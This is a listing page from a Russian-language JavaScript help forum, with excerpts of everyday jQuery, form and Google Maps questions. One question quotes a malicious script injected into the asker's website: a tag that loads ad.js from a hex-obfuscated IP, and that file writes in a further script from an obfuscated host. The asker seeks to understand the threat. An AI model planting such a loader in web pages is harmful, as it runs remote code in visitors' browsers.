JavaScript
A programming language that conforms to the ECMAScript specification
Explore Questions
There are no popular questions to show right now
-
0 votes1 answer
-
0 votes0 answers
-
0 votes0 answers
-
0 votes1 answer
-
0 votes0 answers
4,723 questions in this forum
-
Работа с формати (текстовые поля)
Подскажите как сделать так, чтобы текстовое поле автоматически меняло высоту при добавление в него записей, но до определенного значения высоты... при достежение значения высоты большего чем заданно, должен появиться скролл...
0 votes3 answers -
логика дней\дня
всем привет! Такое вот дело, делаю таймер и вот думаю как сделать логику чтобы писало дней или дня?
0 votes3 answers -
Код работает через раз..((
Здраствуйте. Имеем такую. ситуацию. Есть код, который работает буквально через раз. Хочет работает - хочет нет. Запускаю - сработало - перегрузил -уже нет. Программа проводит валидацию данных с формы. Если конкретнее - не работает часть кода, которая проверяет TEXTAREA с именем comment <script type='text/javascript' src='../../tiny_mce/tiny_mce.js'> </script> <script type='text/javascript'> <!-- tinyMCE.init({ mode : "textareas", theme : "simple" }); --> </script> <script language="JavaScript"> var beg=0; f…
0 votes3 answers -
Посоветуйте ротатор баннеров на jQuery
Собственно, не совсем баннеры, а сплэш-картинки с описанием. Задачи такие: картинке нужно присваивать ссылку, у картинки должно быть отдельно расположенное описание (нормальным HTML кодом), список кнопок с номерами картинок. Вот примерно так надо. Но этот скрипт платный. Мож бесплатные есть?
0 votes3 answers -
Проверка формы
Здравствуйте! Помогите разобраться с проблемой пожалуйста. Сделал форму для своего сайта. Для проверки вводимых данных использую JQuery плагин JQuery Validate http://bassistance.de/jquery-plugins/jquer...gin-validation/ После удачно введённых данных вывожу окно с сообщением. Проблема в том, что после нажатия "отправить" всплывающе оконо появляется, но данные в PHP скрипт не передаются. Форма: <form id="ContactForm" method="post" action="form.php"> <p> <label for="first_name">Nom et prénom</label><br> <input id="first_name" name="fname" class="required"><br> <p> <p> <label for=…
0 votes3 answers -
JS уведомление на почту
В общем, есть задача определить, нажималась ли определенная ссылка. А точнее, так как по jQuery click() вызывается выплывающий слой, открывался ли он? Вот пример страницы. По ссылке "Заказать с доставкой" вылетает окошко с формой. Можно на почту слать уведомления, можно в файл писать или еще как. В принципе, в слое как innerHTML используется PHP-файл. Может из него отправлять, при его подгрузке? Чет я потерялся. Кто идеями реализации богат, подскажите? P.S. Что-то заказывать перестали, не пойму в чем дело
0 votes3 answers -
Помогите найти скрипт
Люди добрые помогите! Я помню на каком то забугорном сайте видел такой пример: при наведении на ссылку в основном меню картинка-подложка слегка размыливалась, а сама кнопка просто выделялась. Может кто нибудь тоже видел что то подобное или делал на JS... Помогите , подскажите.
0 votes3 answers -
Скрипт
Всем доброго дня\вечера! Вот есть такой код жикверный, но у меня есть сомнения что он не совсем правильно работает (смысл в том что скрипт ищет нужные классы, если есть то показует нужную вещ), секций с продуктами должно быть большое количество и думаю нагрузка будет огромная. Если что не так я сделал, то покажите, буду очень благодарен. <style type="text/css"> .info{ width:200px; position:absolute; color:#999999; font-size:14px; font-family:Georgia,serif; background-color:#000000; background:url(pods.png); border:1px solid #cccccc; padding:4px; } </style> <script type="text/javascript"> $(document).ready(function(){ //Хлеб $(".baton").attr({ src:"ba…
0 votes3 answers -
Управление DIV в режиме contenteditable
Требуется: Выяснить позицию коретки. Выяснить состояние скролеров. Восстановить позицию коретки. Восстановить позицию скролеров. Кто подскажет может?
0 votes3 answers -
API Google Map v3
Добрый вечер. Помогите пожалуйста решить такую задачу: Нужно при нажатии на ссылку показать на карте (google map) выбранную область в версии 2 это делалось следующим образом <span onclick="map.setCenter(new GLatLng(40.3,-58.5), 2);" style="cursor: pointer;"><u>Титл ссылки</u></span> От версии 2 к версии 3 код Google API изменился в этом участке следующим образом: v2 var map = new GMap2(document.getElementById("map_canvas")); map.setCenter(new GLatLng(40.3,-58.5), 15);> v3 var myLatlng = new google.maps.LatLng(40.3,-58.5); var myOptions = { zoom: 15, center: myLatlng, mapTypeId: google.maps.MapTypeId.ROADMAP } var map = new google.…
0 votes3 answers -
ошибка в скрипте
имеется 2 чекбокса <input type="checkbox" name="Check1" onClick="agreeForm1(this.form)" /> <input type="checkbox" name="Check3" disabled="disabled" /> тоесть 1 из них в disabled, при выборе первого, второй должен активизироваться, при таком варианте: function agreeForm1() { if (Check1.checked) Check3.disabled = 0 else Check3.disabled = 1 } в Опере работает, а Мозила выдает Ошибка: Check1 is not defined подскажите что не правильно?
0 votes3 answers -
Нужна уникальная галерея фотографий ))
Буду очень благодарен если кто-то поделиться такой фотогалерей (см. http://fotoobmennik.ru/image-48D8_4CE67C1C.jpg ). Может кто-то сам разрабатывал, или кто-то где-то видел, или просто знает где можно взять такое счастье))) Любой подсказке буду очень рад.. Заранее СПАСИБО. Уже много страниц перелопатил, но такое не нашел.
0 votes3 answers -
Подскажите с ajax
Добрый день. Сразу хочу извиниться если объясню суть проблемы некорректно. Я не силен в java и т.п. По примерам у меня получилось сделать следующее... Я создал запрос на ajax $('.ajaxprice').click(function () { //Биндим клик по классу ajaxprice var cityid = this.id.split('_')[1]; //Смотрим id и берем из него код продукта poststr="price_smtovar="+cityid; //Формируем POST $.ajax( //Отправляем { type: "GET", url: "/ajax_price.php", data: poststr, success: function (html) //Обрабатываем ответ { var tewq = html.split(":")[1]; } }); return false; }); обработал на сервере и в переменной var tewq = html.split(":…
0 votes3 answers -
IE8 и доступ к ячейке строки через индексатор
Доброго времени суток. Есть, собственно две проблемы. IE не желает видеть конструкцию вида const MAX_ERR_OUT_LEN=2; это я обошел через задание константы простой переменной, но все же интересно - почему? Второе куда более неприятное - не хочет брать символ из непустой строки через индексатор alert('str : '+str); str=str.replace(re3,'');//replace all separate symbols alert('str replaced: '+str+' str[0]=\''+str[0]+'\''+' str[1]=\''+str[1]+'\''); var str2=str[0]; alert('str2 : '+str2); Первый алерт выводит строку, как положено, второй тоже.. Как только появляется обращение по индексу к ячейке строки - undefined. Заранее спасибо. С уважением, Олег. http:…
0 votes3 answers -
jQuery: click+mousemove
С использованием следующего кода: $(function(){ //Get our elements for faster access and set overlay width var div = $('div.sc_menu'), ul = $('ul.sc_menu'), ulPadding = 15; //Get menu width var divWidth = div.width(); //Remove scrollbars div.css({overflow: 'hidden'}); //Find last image container var lastLi = ul.find('li:last-child'); //When user move mouse over menu div.mousemove(function(e){ //As images are loaded ul width increases, //so we recalculate it each time var ulWidth = lastLi[0].offsetLeft + lastLi.outerWidth() + ulPadding; var left = (e.pageX - div.offset().left) * (ulWidth-divWidth) / divWidth; div.scrollLeft(left); })…
0 votes3 answers -
Некий вредоносный код
Google Chrome ругается на сайт и говорит, что он содержит данные с другого сайта, содержащий вредоносный код. На самом сайте в конце главной страницы обнаружил следующий код: <script src=http://0x4d.0xf2.0x00.0x0c/ad.js></script></script> В шестнадцатеричном виде написан ip-сайта 77.242.0.12. Перейдя по ссылке и открыв файл с js-кодом увидел следующее: <script>document.write('<script src=http:\/\/5602672652\/.../><\/script>');</script> Оставим вопрос о том, что кто-то мог внедриться на сайт и внести в его страницы эту бяку. Интересует, чем этот код вреден и что плохого он может сделать?
0 votes3 answers -
jQuery + Mootools: noConflict
К сожалению, я один из тех, кто столкнулся с такой редкой проблемой.. Суть в том, что только на MooTools мне удалось найти необходимый для меня слайдер. В то время как jQuery использует: меню, модальные окна, табы и галерею. Поэтому подружить их - моя первоочередная задача. Единственный выход из положения - jQuery.noConflict(); - но вот как им воспользоваться я так и не понял. Я уже по всякому вызывал этот скрипт, но ничего не изменилось. <script type="text/javascript" src="jquery/jquery.js"></script> <script type="text/javascript" src="js/script.js"></script> <script type="text/javascript">jQuery.noConflict();</script> <script type=…
0 votes3 answers -
Вопрос по .css() в JQuery
Элементу задаю инлайновые стили через .css() как можно безболезненно удалить какой то из заданых стилей например из этого <div style="height: 330px; display: block; left: 0px; top: 0px;"></div> получить <div style="height: 330px; display: block; left: 0px; "></div>
0 votes3 answers -
Для повышения эрудиции
Мои познания весьма скудны в этом вопросе, пользуюсь по большей части готовыми скриптами. Хочу узнать: JavaScript может работать с файлами? Врайт\реврайт\крейт и тд? И такой же вопрос про БД...
0 votes3 answers -
Помогите
Люди столкнулся с такой проблемой: есть форма, и скрипт <script type="text/javascript"> window.onload = function() { var but = document.getElementById("button"); but.onclick = pro; } function pro() { var title = document.getElementById("title"); var text = document.getElementById("text"); if (title.value == "" || text.value == "") {alert("Заполнены не все поля")} } </script> <form id="form1" name="form1" method="post" action=""> <p> <input type="text" name="title" id="title" /> </p> <p> <textarea name="text" id="text" cols="45" rows="5"></textarea> </p> <p> <input type="submit" name="button" id="button" …
0 votes3 answers -
Переделка скрипта меню на JQuery
Нашел интересное выпадающее меню на JQuery. Демо. Прикрутил его на свой шаблон. Переделал под себя дизайн, но проблема в том что фон выпадающего меню сплошной, я же хочу сделать прозрачный, с закругленными краями и рамкой. Для этого мне нужно сделать три контейнера DIV, предварительно запихнув их в главный контейнер. В div-top положить шапку рамки, в div-content повторяющуюся среднюю, и нижнюю в div-bottom. Но сложность в том, что исходный скрипт распространяется только на один div ".sub", как туда вместить верхний и нижний контейнеры понятия не имею, потому что совсем не ориентируюсь ни в JQuery ни в Jave. Помогите если возможно, ну очень не хочется отказываться от краси…
0 votes3 answers -
textArea
Как сделать так чтоб высота textarea изменялась в зависимости от количества строк текста?
0 votes3 answers -
Как отменить выполнение javascript в iframe ?
Здравствуйте ! У меня такая проблемма. Есть сайт (это не для рекламмы а для наглядного примера) http://333.org.ua (выбиририте пожалуйста в меню ссылок "Чат_Bizarre") Так вот, подгружается сайт в iframe и мой ползунок scroll устанавливается тупо в крайнее нижнее положение и это очень сильно напрягает. Естевственно как только я пытаюсь прокрутить страничку вверх то она тут же перемещается опять вниз так как поступают в чате новые сообщения. Подскажите плиз как можно решить эту проблемму !!! Как отключить выполнение именно того скрипта который устанавливает ползунок scroll в крайнее нижнее положение ??? Заранее Вам благодарен за помошь !
0 votes3 answers -
Необходима помощь! Остановка карусели при наведении курсора мыши.
Есть скрипт указанный ниже. Все отлично работает. Но уже третий день бьюсь над тем, чтобы сделать следующее: "необходимо чтобы при наведении курсора мыши на карусель (на одну из фото), карусель останавливалась, при убирании курсора, снова начинала двигаться" <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link href="http://www.xxx.net/examples/css/examples.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="js/jquery-1.3.2.min.js"></script> <script type="text/javascript" src="js/jcarousellite.js"></script> <script type="text/javascript"> jQuery(function(){ jQuery(".gallery").jCarous…
0 votes3 answers -
Переместить пользователей iPhone
Как переместить пользователей iPhone (iPod, iPad) на другую страницу, например, indexIphone.html Есть такая история: http://www.htaccesstools.com/articles/dete...edirect-iphone/ Не понимаю как реализовать, как должен выглядеть код.
0 votes3 answers